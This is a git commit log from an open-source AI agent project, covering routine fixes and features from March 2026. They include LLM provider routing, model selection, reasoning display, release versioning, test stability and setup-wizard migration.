chore(skills): clean up PR #862 + feat(docs): add search to Docusaurus
2026-03-12 08:20:10 -07:00
teknium1
400b8d92b7 fix: strip call_id/response_item_id from tool_calls for Mistral compatibility
Mistral's API strictly validates the Chat Completions schema and rejects
unknown fields (call_id, response_item_id) with 422. These fields are
added by _build_assistant_message() for Codex Responses API support.

This fix:
- Only strips when targeting Mistral (api.mistral.ai in base_url)
- Creates new tool_call dicts instead of mutating originals (shallow
  copy safety — msg.copy() shares the tool_calls list)
- Preserves call_id/response_item_id in the internal message history
  so _chat_messages_to_responses_input() can still read them if the
  session falls back to a Codex provider mid-conversation

Applied in all 3 API message building locations:
- Main conversation loop (run_conversation)
- _handle_max_iterations()
- flush_memories()
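
Sketch of the conditional strip (names illustrative; the real code
lives in the three call sites above):

  def _strip_codex_fields(msg: dict, base_url: str) -> dict:
      if "api.mistral.ai" not in base_url or not msg.get("tool_calls"):
          return msg
      cleaned = msg.copy()
      # build new dicts: msg.copy() is shallow, so mutating the
      # original tool_call dicts would corrupt internal history
      cleaned["tool_calls"] = [
          {k: v for k, v in tc.items() if k not in ("call_id", "response_item_id")}
          for tc in msg["tool_calls"]
      ]
      return cleaned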

Inspired by PR #864 (unmodeled-tyler) which identified the issue but
applied the fix unconditionally and mutated originals via shallow copy.

Co-authored-by: unmodeled-tyler <unmodeled.tyler@proton.me>
2026-03-12 08:18:27 -07:00
teknium1
6b211bf008 feat(docs): add local search to Docusaurus site
Add @easyops-cn/docusaurus-search-local (v0.55.1) for offline/local
full-text search across all documentation pages.

- Search bar appears in the navbar (Ctrl/Cmd+K shortcut)
- Builds a search index at build time — no external service needed
- Highlights matched terms on target page after clicking a result
- Dedicated /search page for expanded results
- Blog indexing disabled (blog is off)
- docsRouteBasePath set to '/' to match existing docs routing
2026-03-12 08:15:05 -07:00
Teknium
68fdc62d8f feat: offer OpenClaw migration during first-time setup wizard (#981)
feat: offer OpenClaw migration during first-time setup wizard
2026-03-12 08:12:30 -07:00
teknium1
bb7cdc6d44 chore(skills): clean up PR #862 — simplify manifest guard, DRY up tests
Follow-up to PR #862 (local skills classification by arceus77-7):

- Remove unnecessary isinstance guard on _read_manifest() return value —
  it always returns Dict[str, str], so set() on it suffices.
- Extract repeated hub-dir monkeypatching into a shared pytest fixture (hub_env).
- Add three_source_env fixture for source-classification tests.
- Add _read_manifest monkeypatch to test_do_list_initializes_hub_dir
  (was fragile — relied on empty skills list masking the real manifest).
- Add test coverage for --source hub and --source builtin filters.
- Extract _capture() helper to reduce console/StringIO boilerplate.

5 tests, all green.
2026-03-12 08:08:22 -07:00
Teknium
7e637d3b6a Merge pull request #862 from arceus77-7/fix/skills-list-source-provenance
Merging — clean fix for local skills mislabeling. Follow-up cleanup coming.
2026-03-12 08:05:34 -07:00
Teknium
2a62514d17 feat: add 'View full command' option to dangerous command approval (#887)
When a dangerous command is detected and the user is prompted for
approval, long commands are truncated (80 chars in fallback, 70 chars
in the TUI). Users had no way to see the full command before deciding.

This adds a 'View full command' option across all approval interfaces:

- CLI fallback (tools/approval.py): [v]iew option in the prompt menu.
  Shows the full command and re-prompts for approval decision.
- CLI TUI (cli.py): 'Show full command' choice in the arrow-key
  selection panel. Expands the command display in-place and removes
  the view option after use.
- CLI callbacks (callbacks.py): 'view' choice added to the list when
  the command exceeds 70 characters.
- Gateway (gateway/run.py): 'full', 'show', 'view' responses reveal
  the complete command while keeping the approval pending.

Includes 7 new tests covering view-then-approve, view-then-deny,
short command fallthrough, and double-view behavior.

Addresses community feedback about the 80-char cap on dangerous commands.
2026-03-12 06:27:21 -07:00
Teknium
e9c3317158 fix: improve Kimi model selection — auto-detect endpoint, add missing models (#1039)
* fix: /reasoning command output ordering, display, and inline think extraction

Three issues with the /reasoning command:

1. Output interleaving: The command echo used print() while feedback
   used _cprint(), causing them to render out-of-order under
   prompt_toolkit's patch_stdout. Changed echo to use _cprint() so
   all output renders through the same path in correct order.

2. Reasoning display not working: /reasoning show toggled a flag
   but reasoning never appeared for models that embed thinking in
   inline <think> blocks rather than structured API fields. Added
   fallback extraction in _build_assistant_message to capture
   <think> block content as reasoning when no structured reasoning
   fields (reasoning, reasoning_content, reasoning_details) are
   present. This feeds into both the reasoning callback (during
   tool loops) and the post-response reasoning box display.

3. Feedback clarity: Added checkmarks to confirm actions, persisted
   show/hide to config (was session-only before), and aligned the
   status display for readability.

Tests: 7 new tests for inline think block extraction (41 total).

* feat: add /reasoning command to gateway (Telegram/Discord/etc)

The /reasoning command only existed in the CLI — messaging platforms
had no way to view or change reasoning settings. This adds:

1. /reasoning command handler in the gateway:
   - No args: shows current effort level and display state
   - /reasoning <level>: sets reasoning effort (none/low/medium/high/xhigh)
   - /reasoning show|hide: toggles reasoning display in responses
   - All changes saved to config.yaml immediately

2. Reasoning display in gateway responses:
   - When show_reasoning is enabled, prepends a 'Reasoning' block
     with the model's last_reasoning content before the response
   - Collapses long reasoning (>15 lines) to keep messages readable
   - Uses last_reasoning from run_conversation result dict

3. Plumbing:
   - Added _show_reasoning attribute loaded from config at startup
   - Propagated last_reasoning through _run_agent return dict
   - Added /reasoning to help text and known_commands set
   - Uses getattr for _show_reasoning to handle test stubs

* fix: improve Kimi model selection — auto-detect endpoint, add missing models

Kimi Coding Plan setup:
- New dedicated _model_flow_kimi() replaces the generic API-key flow
  for kimi-coding. Removes the confusing 'Base URL' prompt entirely —
  the endpoint is auto-detected from the API key prefix:
    sk-kimi-* → api.kimi.com/coding/v1 (Kimi Coding Plan)
    other     → api.moonshot.ai/v1 (legacy Moonshot)

- Shows appropriate models for each endpoint:
    Coding Plan: kimi-for-coding, kimi-k2.5, kimi-k2-thinking, kimi-k2-thinking-turbo
    Moonshot:    full model catalog

- Clears any stale KIMI_BASE_URL override so runtime auto-detection
  via _resolve_kimi_base_url() works correctly.
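
The detection reduces to a prefix check, roughly (sketch;
_resolve_kimi_base_url is the real helper):

  def _resolve_kimi_base_url(api_key: str) -> str:
      # Coding Plan keys carry the sk-kimi- prefix
      if api_key.startswith("sk-kimi-"):
          return "https://api.kimi.com/coding/v1"
      # anything else is treated as a legacy Moonshot key
      return "https://api.moonshot.ai/v1"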

Model catalog updates:
- Added kimi-for-coding (primary Coding Plan model) and kimi-k2-thinking-turbo
  to models.py, main.py _PROVIDER_MODELS, and model_metadata.py context windows.

- Updated User-Agent from KimiCLI/1.0 to KimiCLI/1.3 (Kimi's coding
  endpoint whitelists known coding agents via User-Agent sniffing).
2026-03-12 05:58:48 -07:00
Teknium
1e3607150c Merge pull request #1040 from NousResearch/hermes/hermes-5da06378
feat: include session ID in system prompt via --pass-session-id flag
2026-03-12 05:52:26 -07:00
dmahan93
c7fc39bde0 feat: include session ID in system prompt via --pass-session-id flag
Adds --pass-session-id CLI flag. When set, the agent's system prompt
includes the session ID:

  Conversation started: Sunday, March 08, 2026 06:32 PM
  Session ID: 20260308_183200_abc123

Usage:
  hermes --pass-session-id
  hermes chat --pass-session-id

Implementation threads the flag as a proper parameter through the full
chain (main.py → cli.py → run_agent.py) rather than using an env var,
avoiding collisions in multi-agent/multitenant setups.

Based on PR #726 by dmahan93, reworked to use instance parameter
instead of HERMES_PASS_SESSION_ID environment variable.

Co-authored-by: dmahan93 <dmahan93@users.noreply.github.com>
2026-03-12 05:51:31 -07:00
Teknium
e782b92bca fix: /reasoning command — add gateway support, fix display, persist settings (#1031)
* fix: /reasoning command output ordering, display, and inline think extraction

Three issues with the /reasoning command:

1. Output interleaving: The command echo used print() while feedback
   used _cprint(), causing them to render out-of-order under
   prompt_toolkit's patch_stdout. Changed echo to use _cprint() so
   all output renders through the same path in correct order.

2. Reasoning display not working: /reasoning show toggled a flag
   but reasoning never appeared for models that embed thinking in
   inline <think> blocks rather than structured API fields. Added
   fallback extraction in _build_assistant_message to capture
   <think> block content as reasoning when no structured reasoning
   fields (reasoning, reasoning_content, reasoning_details) are
   present. This feeds into both the reasoning callback (during
   tool loops) and the post-response reasoning box display.

3. Feedback clarity: Added checkmarks to confirm actions, persisted
   show/hide to config (was session-only before), and aligned the
   status display for readability.

Tests: 7 new tests for inline think block extraction (41 total).
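
A minimal sketch of the fallback extraction from item 2 (regex
approach assumed):

  import re

  _THINK_RE = re.compile(r"<think>(.*?)</think>", re.DOTALL)

  def extract_inline_reasoning(content: str) -> tuple[str, str]:
      # returns (reasoning, content with <think> blocks removed)
      blocks = _THINK_RE.findall(content)
      if not blocks:
          return "", content
      reasoning = "\n\n".join(b.strip() for b in blocks)
      return reasoning, _THINK_RE.sub("", content).strip()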

* feat: add /reasoning command to gateway (Telegram/Discord/etc)

The /reasoning command only existed in the CLI — messaging platforms
had no way to view or change reasoning settings. This adds:

1. /reasoning command handler in the gateway:
   - No args: shows current effort level and display state
   - /reasoning <level>: sets reasoning effort (none/low/medium/high/xhigh)
   - /reasoning show|hide: toggles reasoning display in responses
   - All changes saved to config.yaml immediately

2. Reasoning display in gateway responses:
   - When show_reasoning is enabled, prepends a 'Reasoning' block
     with the model's last_reasoning content before the response
   - Collapses long reasoning (>15 lines) to keep messages readable
   - Uses last_reasoning from run_conversation result dict

3. Plumbing:
   - Added _show_reasoning attribute loaded from config at startup
   - Propagated last_reasoning through _run_agent return dict
   - Added /reasoning to help text and known_commands set
   - Uses getattr for _show_reasoning to handle test stubs
2026-03-12 05:38:19 -07:00
Teknium
a370ab8391 Merge pull request #1018 from NousResearch/hermes/hermes-37fb78aa
feat: versioning infrastructure + release script + v0.2.0 changelog
2026-03-12 03:07:11 -07:00
teknium1
92e9809c86 fix: fetch live model lists from provider APIs instead of static lists
curated_models_for_provider() now tries the live API first (via
provider_model_ids) before falling back to static _PROVIDER_MODELS.
This means /model and /provider slash commands show the actual
available models, not a stale hardcoded list.

Also added live Nous Portal model fetching via fetch_nous_models()
in provider_model_ids(), alongside the existing Codex live fetch.
2026-03-12 02:46:33 -07:00
teknium1
364cb956c1 chore: rebuild changelog with correct time window (Feb 25 12PM PST onwards)
Changelog now covers only v0.1.0 → v0.2.0 changes:
- 216 merged PRs (not all 231)
- 119 resolved issues
- 63 contributors (not 74+)
- Window: Feb 25 2026 12PM PST to present
2026-03-12 02:33:50 -07:00
teknium1
8d182ec733 chore: bump version to v0.2.0 + add curated first-release changelog
- Update __version__ to 0.2.0 (was 0.1.0)
- Update pyproject.toml to match
- Add RELEASE_v0.2.0.md with comprehensive changelog covering:
  - All 231 merged PRs
  - 120 resolved issues
  - 74+ contributors credited
  - Organized by feature area with PR links
2026-03-12 01:52:53 -07:00
teknium1
323ca70846 feat: add versioning infrastructure and release script
- Fix version mismatch: __init__.py had 'v1.0.0', pyproject.toml had '0.1.0'
  Now both use '0.1.0' (no v prefix — added in display code only)
- Add __release_date__ for CalVer date tracking alongside SemVer version
- Fix double-v bug in cmd_version (was printing 'vv1.0.0')
- Update banner title to show 'Hermes Agent v0.1.0 (2026.3.12)' format
- Update cli.py banner to match new format
- Add scripts/release.py: full release automation tool
  - Generates categorized changelogs from git history
  - Maps git authors to GitHub @mentions (70+ contributors)
  - Supports dry-run preview and --publish mode
  - Creates annotated CalVer git tags + GitHub Releases
  - Bumps semver in source files automatically
  - Usage: python scripts/release.py --bump minor --publish
- Add .release_notes.md to .gitignore

Versioning scheme: CalVer tags (v2026.3.12) + SemVer display (v0.1.0)
2026-03-12 01:35:47 -07:00
teknium1
a37fc05171 fix: skip hanging tests + add global test timeout
4 test files spawn real processes or make live API calls that hang
indefinitely in batch/CI runs. Skip them with pytestmark:

- tests/tools/test_code_execution.py (subprocess spawns)
- tests/tools/test_file_tools_live.py (live LocalEnvironment)
- tests/test_413_compression.py (blocks on process)
- tests/test_agent_loop_tool_calling.py (live OpenRouter API calls)

Also added global 30s signal.alarm timeout in conftest.py as a safety
net, and removed stale nous-api test that hung on OAuth browser login.

Suite now runs in ~55s with no hangs.
2026-03-12 01:23:28 -07:00
teknium1
1956b9d97a fix: remove nous-api test + fix OAuth test index after nous-api removal
- Remove test_nous_api_setup_preserves_model_provider_metadata (nous-api
  provider no longer exists, test selected Nous OAuth which hangs waiting
  for browser login)
- Fix test_nous_oauth_setup prompt_choice index: 1→0 (Nous Portal is
  now first option after nous-api removal)
2026-03-12 00:51:30 -07:00
Teknium
9cb9d1a47a Merge pull request #1003 from NousResearch/hermes/hermes-cf9f7d54
feat: centralized provider router, call_llm API, unified /model command
2026-03-12 00:29:18 -07:00
teknium1
2192b17670 merge: resolve conflicts with origin/main
- gateway/run.py: Take main's _resolve_gateway_model() helper
- hermes_cli/setup.py: Re-apply nous-api removal after merge brought
  it back. Fix provider_idx offset (Custom is now index 3, not 4).
- tests/hermes_cli/test_setup.py: Fix custom setup test index (3→4)
2026-03-12 00:29:04 -07:00
teknium1
7febdf7208 fix: custom endpoint model validation + better /model error messages
- Custom endpoints can serve any model, so skip validation for
  provider='custom' in validate_requested_model(). Previously it
  would reject any model name since there's no static catalog or
  live API to check against.
- Show clear setup instructions when switching to custom endpoint
  without OPENAI_BASE_URL/OPENAI_API_KEY configured.
- Added curated model lists for Nous Portal and OpenAI Codex to
  _PROVIDER_MODELS so /model shows their available models.
2026-03-11 23:29:26 -07:00
teknium1
ec2c6dff70 feat: unified /model and /provider into single view
Both /model and /provider now show the same unified display:

  Current: anthropic/claude-opus-4.6 via OpenRouter

  Authenticated providers & models:
    [openrouter] ← active
      anthropic/claude-opus-4.6 ← current
      anthropic/claude-sonnet-4.5
      ...
    [nous]
      claude-opus-4-6
      gemini-3-flash
      ...
    [openai-codex]
      gpt-5.2-codex
      gpt-5.1-codex-mini
      ...

  Not configured: Z.AI / GLM, Kimi / Moonshot, ...

  Switch model:    /model <model-name>
  Switch provider: /model <provider>:<model-name>
  Example: /model nous:claude-opus-4-6

Users can see all authenticated providers and their models at a glance,
making it easy to switch mid-conversation.

Also added curated model lists for Nous Portal and OpenAI Codex to
hermes_cli/models.py.
2026-03-11 23:06:06 -07:00
teknium1
65356003e3 revert: keep provider preferences for all providers (Nous will proxy)
Nous Portal backend will become a transparent proxy for OpenRouter-
specific parameters (provider preferences, etc.), so keep sending them
to all providers. The reasoning disabled fix is kept (that's a real
constraint of the Nous endpoint).
2026-03-11 22:53:06 -07:00
teknium1
a7e5f19528 fix: don't send OpenRouter-specific provider preferences to Nous Portal
Two bugs in _build_api_kwargs that broke Nous Portal:

1. Provider preferences (only, ignore, order, sort) are OpenRouter-
   specific routing features. They were being sent in extra_body to ALL
   providers, including Nous Portal. When the config had
   providers_only=['google-vertex'], Nous Portal returned 404 'Inference
   host not found' because it doesn't have a google-vertex backend.

   Fix: Only include provider preferences when _is_openrouter is True.

2. Reasoning config with enabled=false was being sent to Nous Portal,
   which requires reasoning and returns 400 'Reasoning is mandatory for
   this endpoint and cannot be disabled.'

   Fix: Omit the reasoning parameter for Nous when enabled=false.

Root cause found via HERMES_DUMP_REQUESTS=1 which showed the exact
request payload being sent to Nous Portal's inference API.
2026-03-11 22:41:33 -07:00
teknium1
9302690e1b refactor: remove LLM_MODEL env var dependency — config.yaml is sole source of truth
Model selection now comes exclusively from config.yaml (set via
'hermes model' or 'hermes setup'). The LLM_MODEL env var is no longer
read or written anywhere in production code.

Why: env vars are per-process/per-user and would conflict in
multi-agent or multi-tenant setups. Config.yaml is file-based and
can be scoped per-user or eventually per-session.

Changes:
- cli.py: Read model from CLI_CONFIG only, not LLM_MODEL/OPENAI_MODEL
- hermes_cli/auth.py: _save_model_choice() no longer writes LLM_MODEL
  to .env
- hermes_cli/setup.py: Remove 12 save_env_value('LLM_MODEL', ...)
  calls from all provider setup flows
- gateway/run.py: Remove LLM_MODEL fallback (HERMES_MODEL still works
  for gateway process runtime)
- cron/scheduler.py: Same
- agent/auxiliary_client.py: Remove LLM_MODEL from custom endpoint
  model detection
2026-03-11 22:04:42 -07:00
teknium1
a29801286f refactor: route main agent client + fallback through centralized router
Phase 2 of the provider router migration — route the main agent's
client construction and fallback activation through
resolve_provider_client() instead of duplicated ad-hoc logic.

run_agent.py:
- __init__: When no explicit api_key/base_url, use
  resolve_provider_client(provider, raw_codex=True) for client
  construction. Explicit creds (from CLI/gateway runtime provider)
  still construct directly.
- _try_activate_fallback: Replace _resolve_fallback_credentials and
  its duplicated _FALLBACK_API_KEY_PROVIDERS / _FALLBACK_OAUTH_PROVIDERS
  dicts with a single resolve_provider_client() call. The router
  handles all provider types (API-key, OAuth, Codex) centrally.
- Remove _resolve_fallback_credentials method and both fallback dicts.

agent/auxiliary_client.py:
- Add raw_codex parameter to resolve_provider_client(). When True,
  returns the raw OpenAI client for Codex providers instead of wrapping
  in CodexAuxiliaryClient. The main agent needs this for direct
  responses.stream() access.

3251 passed, 2 pre-existing unrelated failures.
2026-03-11 21:38:29 -07:00
teknium1
29ef69c703 fix: update all test mocks for call_llm migration
Update 14 test files to use the new call_llm/async_call_llm mock
patterns instead of the old get_text_auxiliary_client/
get_vision_auxiliary_client tuple returns.

- vision_tools tests: mock async_call_llm instead of _aux_async_client
- browser tests: mock call_llm instead of _aux_vision_client
- flush_memories tests: mock call_llm instead of get_text_auxiliary_client
- session_search tests: mock async_call_llm with RuntimeError
- mcp_tool tests: fix whitelist model config, use side_effect for
  multi-response tests
- auxiliary_config_bridge: update for model=None (resolved in router)

3251 passed, 2 pre-existing unrelated failures.
2026-03-11 21:06:54 -07:00
teknium1
0aa31cd3cb feat: call_llm/async_call_llm + config slots + migrate all consumers
Add centralized call_llm() and async_call_llm() functions that own the
full LLM request lifecycle:
  1. Resolve provider + model from task config or explicit args
  2. Get or create a cached client for that provider
  3. Format request args (max_tokens handling, provider extra_body)
  4. Make the API call with max_tokens/max_completion_tokens retry
  5. Return the response

Config: expanded auxiliary section with provider:model slots for all
tasks (compression, vision, web_extract, session_search, skills_hub,
mcp, flush_memories). Config version bumped to 7.

Migrated all auxiliary consumers:
- context_compressor.py: uses call_llm(task='compression')
- vision_tools.py: uses async_call_llm(task='vision')
- web_tools.py: uses async_call_llm(task='web_extract')
- session_search_tool.py: uses async_call_llm(task='session_search')
- browser_tool.py: uses call_llm(task='vision'/'web_extract')
- mcp_tool.py: uses call_llm(task='mcp')
- skills_guard.py: uses call_llm(provider='openrouter')
- run_agent.py flush_memories: uses call_llm(task='flush_memories')

Tests updated for context_compressor and MCP tool. Some test mocks
still need updating (15 remaining failures from mock pattern changes,
2 pre-existing).
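
Consumer-side shape after the migration (sketch; the import path and
any keyword beyond task/messages are assumptions):

  from agent.auxiliary_client import call_llm  # import path assumed

  # provider + model resolve from the task's config slot; client
  # caching and the max_tokens retry happen inside call_llm
  response = call_llm(
      task="compression",
      messages=[{"role": "user", "content": "Summarize this transcript..."}],
  )
  summary = response.choices[0].message.content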
2026-03-11 20:52:19 -07:00
teknium1
013cc4d2fc chore: remove nous-api provider (API key path)
Nous Portal only supports OAuth authentication. Remove the 'nous-api'
provider which allowed direct API key access via NOUS_API_KEY env var.

Removed from:
- hermes_cli/auth.py: PROVIDER_REGISTRY entry + aliases
- hermes_cli/config.py: OPTIONAL_ENV_VARS entry
- hermes_cli/setup.py: setup wizard option + model selection handler
  (reindexed remaining provider choices)
- agent/auxiliary_client.py: docstring references
- tests/test_runtime_provider_resolution.py: nous-api test
- tests/integration/test_web_tools.py: renamed dict key
2026-03-11 20:14:44 -07:00
teknium1
07f09ecd83 refactor: route ad-hoc LLM consumers through centralized provider router
Route all remaining ad-hoc auxiliary LLM call sites through
resolve_provider_client() so auth, headers, and API format (Chat
Completions vs Responses API) are handled consistently in one place.

Files changed:

- tools/openrouter_client.py: Replace manual AsyncOpenAI construction
  with resolve_provider_client('openrouter', async_mode=True). The
  shared client module now delegates entirely to the router.

- tools/skills_guard.py: Replace inline OpenAI client construction
  (hardcoded OpenRouter base_url, manual api_key lookup, manual
  headers) with resolve_provider_client('openrouter'). Remove unused
  OPENROUTER_BASE_URL import.

- trajectory_compressor.py: Add _detect_provider() to map config
  base_url to a provider name, then route through
  resolve_provider_client. Falls back to raw construction for
  unrecognized custom endpoints.

- mini_swe_runner.py: Route default case (no explicit api_key/base_url)
  through resolve_provider_client('openrouter') with auto-detection
  fallback. Preserves direct construction when explicit creds are
  passed via CLI args.

- agent/auxiliary_client.py: Fix stale module docstring — vision auto
  mode now correctly documents that Codex and custom endpoints are
  tried (not skipped).
2026-03-11 20:02:36 -07:00
teknium1
8805e705a7 feat: centralized provider router + fix Codex vision bypass + vision error handling
Three interconnected fixes for auxiliary client infrastructure:

1. CENTRALIZED PROVIDER ROUTER (auxiliary_client.py)
   Add resolve_provider_client(provider, model, async_mode) — a single
   entry point for creating properly configured clients. Given a provider
   name and optional model, it handles auth lookup (env vars, OAuth
   tokens, auth.json), base URL resolution, provider-specific headers,
   and API format differences (Chat Completions vs Responses API for
   Codex). All auxiliary consumers should route through this instead of
   ad-hoc env var lookups.

   Refactored get_text_auxiliary_client, get_async_text_auxiliary_client,
   and get_vision_auxiliary_client to use the router internally.

2. FIX CODEX VISION BYPASS (vision_tools.py)
   vision_tools.py was constructing a raw AsyncOpenAI client from the
   sync vision client's api_key/base_url, completely bypassing the Codex
   Responses API adapter. When the vision provider resolved to Codex,
   the raw client would hit chatgpt.com/backend-api/codex with
   chat.completions.create() which only supports the Responses API.

   Fix: Added get_async_vision_auxiliary_client() which properly wraps
   Codex into AsyncCodexAuxiliaryClient. vision_tools.py now uses this
   instead of manual client construction.

3. FIX COMPRESSION FALLBACK + VISION ERROR HANDLING
   - context_compressor.py: Removed _get_fallback_client() which blindly
     looked for OPENAI_API_KEY + OPENAI_BASE_URL (fails for Codex OAuth,
     API-key providers, users without OPENAI_BASE_URL set). Replaced
     with fallback loop through resolve_provider_client() for each
     known provider, with same-provider dedup.

   - vision_tools.py: Added error detection for vision capability
     failures. Returns clear message to the model when the configured
     model doesn't support vision, instead of a generic error.
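
Call-site shape for the router in (1) (sketch; the return value is
assumed to be a ready-to-use client):

  from agent.auxiliary_client import resolve_provider_client

  # auth lookup (env vars, OAuth, auth.json), base URL, headers, and
  # Chat Completions vs Responses API wrapping all happen inside
  client = resolve_provider_client("openrouter", model=None, async_mode=False)
  resp = client.chat.completions.create(
      model="anthropic/claude-sonnet-4.5",
      messages=[{"role": "user", "content": "ping"}],
  )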

Addresses #886
2026-03-11 19:46:47 -07:00
Erosika
2d35016b94 fix(honcho): harden tool gating and migration peer routing
Prevent stale Honcho tool exposure in context/local modes, restore reliable async write retry behavior, and ensure SOUL.md migration uploads target the AI peer instead of the user peer. Also align Honcho CLI key checks with host-scoped apiKey resolution and lock the fixes with regression tests.

Made-with: Cursor
2026-03-11 18:21:27 -04:00
Erosika
8cddcfa0d8 docs(honcho): update config docs for host-scoped write convention
- Example config now shows hosts.hermes structure instead of flat root
- Config table split into root-level (shared) and host-level sections
- sessionStrategy default corrected to per-session
- Multi-host section expanded with two-tool example
- Note that existing root-level configs still work via fallback
2026-03-11 17:53:39 -04:00
Erosika
3c813535a7 fix(honcho): scope config writes to hosts.hermes, not root
Config writes from hermes honcho setup/peer now go to
hosts.hermes instead of mutating root-level keys. Root is
reserved for the user or honcho CLI. apiKey remains at root
as a shared credential.

Reads updated to check hosts.hermes first with root fallback
for all fields (peerName, enabled, saveMessages, environment,
sessionStrategy, sessionPeerPrefix).
2026-03-11 17:45:35 -04:00
kshitij
0712639441 test: verify reloaded config drives setup after migration 2026-03-12 02:56:36 +05:30
kshitij
4f427167ac chore: clean OpenClaw migration follow-up 2026-03-12 02:49:29 +05:30
teknium1
44bf859c3b feat: offer OpenClaw migration during first-time setup wizard
When a new user runs 'hermes setup' for the first time and ~/.openclaw/
exists, the wizard now asks if they want to import their OpenClaw data
before API/tool configuration begins.

If accepted, the existing migration script from optional-skills/ is
loaded dynamically and run with the 'full' preset — importing settings,
memories, skills, API keys, and platform configs. Config is reloaded
afterward so imported values (like API keys) are available for the
remaining setup steps.

The migration is only offered on first-time setup (not returning users)
and handles errors gracefully without blocking setup completion.

Closes #829
2026-03-12 02:40:00 +05:30
Erosika
d987ff54a1 fix: change session_strategy default from per-directory to per-session
Matches Hermes' native session naming (title if set, otherwise
session-scoped). Not a breaking change -- no memory data is lost,
old sessions remain in Honcho.
2026-03-11 15:42:35 -04:00
Erosika
a0b0dbe6b2 Merge remote-tracking branch 'origin/main' into feat/honcho-async-memory
Made-with: Cursor

# Conflicts:
#	cli.py
#	tests/test_run_agent.py
2026-03-11 12:22:56 -04:00
Teknium
8fa96debc9 Merge pull request #963 from NousResearch/hermes/hermes-cf9f7d54
fix: guard all print() against OSError with _SafeWriter
2026-03-11 09:19:52 -07:00
teknium1
a8409a161f fix: guard all print() calls against OSError with _SafeWriter
When hermes-agent runs as a systemd service, Docker container, or
headless daemon, the stdout pipe can become unavailable (idle timeout,
buffer exhaustion, socket reset). Any print() call then raises
OSError: [Errno 5] Input/output error, crashing run_conversation()
and causing cron jobs to fail.

Rather than wrapping individual print() calls (68 in run_conversation
alone), this adds a transparent _SafeWriter wrapper installed once at
the start of run_conversation(). It delegates all writes to the real
stdout and silently catches OSError. Zero overhead on the happy path,
comprehensive coverage of all print calls including future ones.
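
The wrapper, sketched (the real class may differ in detail):

  import sys

  class _SafeWriter:
      def __init__(self, stream):
          self._stream = stream
      def write(self, data):
          try:
              return self._stream.write(data)
          except OSError:
              return 0   # pipe gone: drop output instead of crashing
      def flush(self):
          try:
              self._stream.flush()
          except OSError:
              pass
      def __getattr__(self, name):
          # everything else (encoding, isatty, ...) passes through
          return getattr(self._stream, name)

  sys.stdout = _SafeWriter(sys.stdout)   # installed once per run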

Fixes #845

Co-authored-by: J0hnLawMississippi <J0hnLawMississippi@users.noreply.github.com>
2026-03-11 09:19:10 -07:00
kshitij-eliza
452593319b fix(setup): preserve provider metadata during model selection 2026-03-11 09:17:09 -07:00
Teknium
73ba4987d5 Merge pull request #960 from NousResearch/hermes/hermes-20ea56c0
fix: add exc_info=True to image generation error logging
2026-03-11 09:16:30 -07:00
aydnOktay
41fa4fbaa5 fix: add exc_info=True to image generation error logging
Adds full stack traces to error logs in _upscale_image() and
image_generate_tool() for better debugging. Matches the pattern
used across the rest of the codebase.

Cherry-picked from PR #868 by aydnOktay.

Co-authored-by: aydnOktay <aydnOktay@users.noreply.github.com>
2026-03-11 09:15:45 -07:00
insecurejezza
11825ccefa feat(gateway): thread-aware free-response routing for Discord
- Forum parent channel IDs now match free-response list (add a forum
  channel ID and all its threads respond without mention)
- Better thread chat names: 'Guild / forum / thread' for forum threads
- Add discord.require_mention and discord.free_response_channels to
  config.yaml (bridged to env vars, env vars still override)
- Keep require_mention defaulting to true (safe for shared servers)

Cherry-picked from PR #867 by insecurejezza with default fix and
config.yaml integration.

Co-authored-by: insecurejezza <insecurejezza@users.noreply.github.com>
2026-03-11 09:15:31 -07:00
teknium1
91101065bb fix: improve git error logging in checkpoint manager
- Log command, return code, and stderr on non-zero exit
- Add exc_info=True to timeout, FileNotFoundError, and catch-all handlers
- Add debug field to restore() error responses with raw git output
- Keeps user-facing error messages clean while preserving detail for debugging

Inspired by PR #843 (aydnOktay).
2026-03-11 09:00:09 -07:00
teknium1
01bec40724 refactor(gateway): consolidate model resolution via _resolve_gateway_model()
Replace two inline copies of the env/config model resolution pattern
(in _run_agent_sync and _run_agent) with the _resolve_gateway_model()
helper introduced in PR #830.

Left untouched:
- Session hygiene block: different default (sonnet vs opus) + reads
  compression config from the same YAML load
- /model command: also reads provider from same config block
2026-03-11 08:59:17 -07:00
Teknium
9b58b9bced Merge pull request #955 from NousResearch/hermes/hermes-cf9f7d54
fix(vision): log error when vision client is unavailable + doctor MiniMax fix
2026-03-11 08:59:11 -07:00
teknium1
b66c8b409c fix(vision): log error when vision client is unavailable
Previously the early return for unconfigured vision model was silent.
Now logs an error so the failure is visible in logs for debugging.

Inspired by PR #839 by aydnOktay.

Co-authored-by: aydnOktay <aydnOktay@users.noreply.github.com>
2026-03-11 08:58:56 -07:00
Teknium
09b1de5f71 Merge pull request #954 from NousResearch/hermes/hermes-20ea56c0
fix(config): atomic write for .env to prevent API key loss on crash
2026-03-11 08:58:52 -07:00
alireza78a
3667138d05 fix(config): atomic write for .env to prevent API key loss on crash
save_env_value() used bare open('w') which truncates .env immediately.
A crash or OOM kill between truncation and completed write silently
wipes every credential in the file.

Write now goes to a temp file first, then os.replace() swaps it
atomically. Either the old .env exists or the new one does — never
a truncated half-write. Same pattern used in cron/jobs.py.
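
The pattern, sketched:

  import os, tempfile

  def atomic_write(path: str, content: str) -> None:
      # temp file in the same directory so os.replace() stays on one
      # filesystem and the swap is atomic
      fd, tmp = tempfile.mkstemp(dir=os.path.dirname(path) or ".")
      try:
          with os.fdopen(fd, "w") as f:
              f.write(content)
          os.replace(tmp, path)  # old file or new file, never half of either
      except BaseException:
          os.unlink(tmp)
          raise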

Cherry-picked from PR #842 by alireza78a, rebased onto current main
with conflict resolution (_secure_file refactor).

Co-authored-by: alireza78a <alireza78a@users.noreply.github.com>
2026-03-11 08:58:33 -07:00
Dev User
66c0b719de fix(gateway): pass model to temporary AIAgent instances
Memory flush, /compress, and session hygiene create AIAgent without
model=, falling back to the hardcoded default "anthropic/claude-opus-4.6".
This fails with a 400 error when the active provider is openai-codex
(Codex only accepts its own model names like gpt-5.1-codex-mini).

Add _resolve_gateway_model() that mirrors the env/config resolution
already used by _run_agent_sync, and wire it into all three temporary
agent creation sites.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-03-11 08:56:19 -07:00
Teknium
d905e612aa Merge pull request #950 from NousResearch/hermes/hermes-20ea56c0
docs: conditional skill activation — duckduckgo-search fallback + documentation
2026-03-11 08:48:40 -07:00
Teknium
fa7a18f42a Merge pull request #949 from NousResearch/hermes/hermes-b86fddbe
fix(cron): handle naive legacy timestamps in due-job checks
2026-03-11 08:47:10 -07:00
teknium1
